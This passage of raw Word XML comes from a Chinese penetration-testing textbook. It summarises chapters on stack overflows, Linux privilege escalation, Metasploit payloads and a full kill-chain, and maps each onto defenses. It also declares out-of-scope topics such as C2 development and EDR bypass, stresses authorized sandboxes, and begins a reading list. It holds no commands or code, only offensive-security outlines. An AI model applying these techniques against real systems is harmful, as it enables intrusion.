        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">栈溢出与缓解（Ch15–16）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存安全假设（返回地址不被覆盖）的突破，现代系统通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR/NX/Canary/PIE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构成多层缓解①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">8.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提权（Ch15–16）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用最小权限或配置错误，防御侧遵循</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基线、定期审计</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制、及时打补丁。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">9.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">全链路（Ch17）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">集成化利用框架的教学使用，生成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">handler，防御侧检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认特征（如默认证书、User-Agent），并实施出入站流量白名单。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">完整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">kill‑chain（Ch22.1）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将以上环节串成连续攻击流，同时为每一步输出防御核查表，真正达成攻防对称的集中兑现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">全馆接口闭环：从“理解”到“攻防”的概念升级与边界声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本教材建立在《从位到物联》全馆体系之上，多个关键知识点已在馆藏其他卷中系统讲授，本书不重复其原理推导，而是直接将其置于攻防场景中进行工程化应用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络栈升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：馆藏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch24–25 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已详细讲解了以太网帧结构、MAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议消息格式；Ch26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">覆盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">寻址、路由与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NAT；Ch27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">深入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机、三次握手与可靠传输；Ch28</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">介绍了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">握手、防火墙与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">概念。本书卷二（Ch6–7）直接复用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理，将其转化为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗与中间人攻击的操作场景，并在防御侧提出动态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测（DAI）与端口安全；Ch8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的流量分析复用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机理解异常连接；Ch19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则编写依赖于对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议字段的精确理解，这正是馆藏网络栈基础的攻防实践延伸。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">系统与体系结构升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：馆藏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch13–18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已经覆盖了汇编语言基础、栈帧结构、进程内存布局、系统调用与虚拟内存。本书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch13–14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接承接这些知识，以栈帧示意图解释缓冲区溢出的根本原因；Ch15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权则基于文件权限、SUID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位、进程凭证等系统概念，不给读者增加新的系统理论负担，而是导向安全配置审核与内核漏洞利用的授权教学。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">密码学接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：馆藏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CM5（数论与密码学）已讲授</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RSA、对称加密、哈希函数和数字签名。本书在涉及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSL/TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中间人攻击、WPA2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">握手、固件签名验证、nonce/时间戳防重放等环节时，直接调用馆藏密码学结论，不再推导数学细节，但反复强调“密码学原语正确使用”与“协议假设被违反”之间的攻防博弈。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与硬件接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：馆藏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch29–31 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已介绍物联网架构、MQTT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OTA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">更新流程。本书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch21.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在此基础上讲授固件提取、UART</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调试口利用和重放攻击，并将其防御严格对应到安全启动、固件签名和关闭生产调试口，形成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全的攻防对偶。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">未覆盖事项的事实性边界声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（不编造“未来方向”）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书作为一本面向授权渗透测试、CTF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">竞赛与蓝队检测工程教学的教材，明确以下内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">未纳入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">教学范围，其技术难度或武器化程度超出了本书设定的授权教学与伦理边界：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">高级二进制利用技术，如堆利用、内核</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编写、竞争条件（race</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">condition）的系统性利用；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">红队指挥控制（C2）平台的定制开发与隐蔽通道构建；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对具体防病毒/EDR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的检测规避（AV/EDR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">bypass）的实操教学；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 0day </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞挖掘与武器化方法；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对真实在野关键基础设施的攻击演练。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这些领域要求更高标准的隔离环境、法律授权和专门的学习路径，读者可在掌握本书基础后，通过专业进阶课程（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OffSec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PEN-300/OSEP）进一步学习。本书始终强调：所有技术学习与操作必须在明确授权、隔离可控的沙箱内进行，任何未经授权的测试行为均属违法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结：三句话复述全书</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第一句：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻防对称是本书的底线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——每展示一种攻击技术，必须对应给出检测方法与修复建议，确保读者在获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> offensive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">视角的同时，始终理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> defensive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的路径。第二句：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">全书以“假设被违反”作为第一性原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">——ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信任、输入类型安全、内存返回地址不可写、端口映射、最小权限、协议完整性……每一个漏洞都是某个设计假设被打破后的工程后果；防御就是通过补丁、配置、架构设计重新加固这些假设。第三句：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令真实，环境值不编造，仅限授权环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——所有给出的命令均基于真实工具语法，但所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP、端口、哈希、flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等环境相关值均以占位符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;...&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代替，且严格声明仅适用于隔离实验网络或官方授权靶机，绝不鼓励或暗示任何非授权测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单收口）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下延伸读物为本书推荐的安全工程进阶材料，均属于行业内广泛认可的权威资料，读者可据此继续深入特定方向：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Georgia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Weidman，《Penetration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testing: A Hands-On Introduction to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking》（No</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Starch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Press）：面向初学者的渗透测试实战，配套靶场环境，与本书思路高度一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OffSec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PEN-200（PWK）课程与配套实验：OSCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证的核心训练，系统性提供从侦察到后渗透的端到端实验库。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Peter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Kim，《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hacker Playbook 3: Practical Guide To Penetration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing》（Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Planet）：包含大量真实场景战术与自动化技巧，适合在完成本书后提升效率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dafydd Stuttard, Marcus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Pinto，《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》（2nd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Edition, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Wiley）：Web</w:t>
      </w:r>
      <w:r>
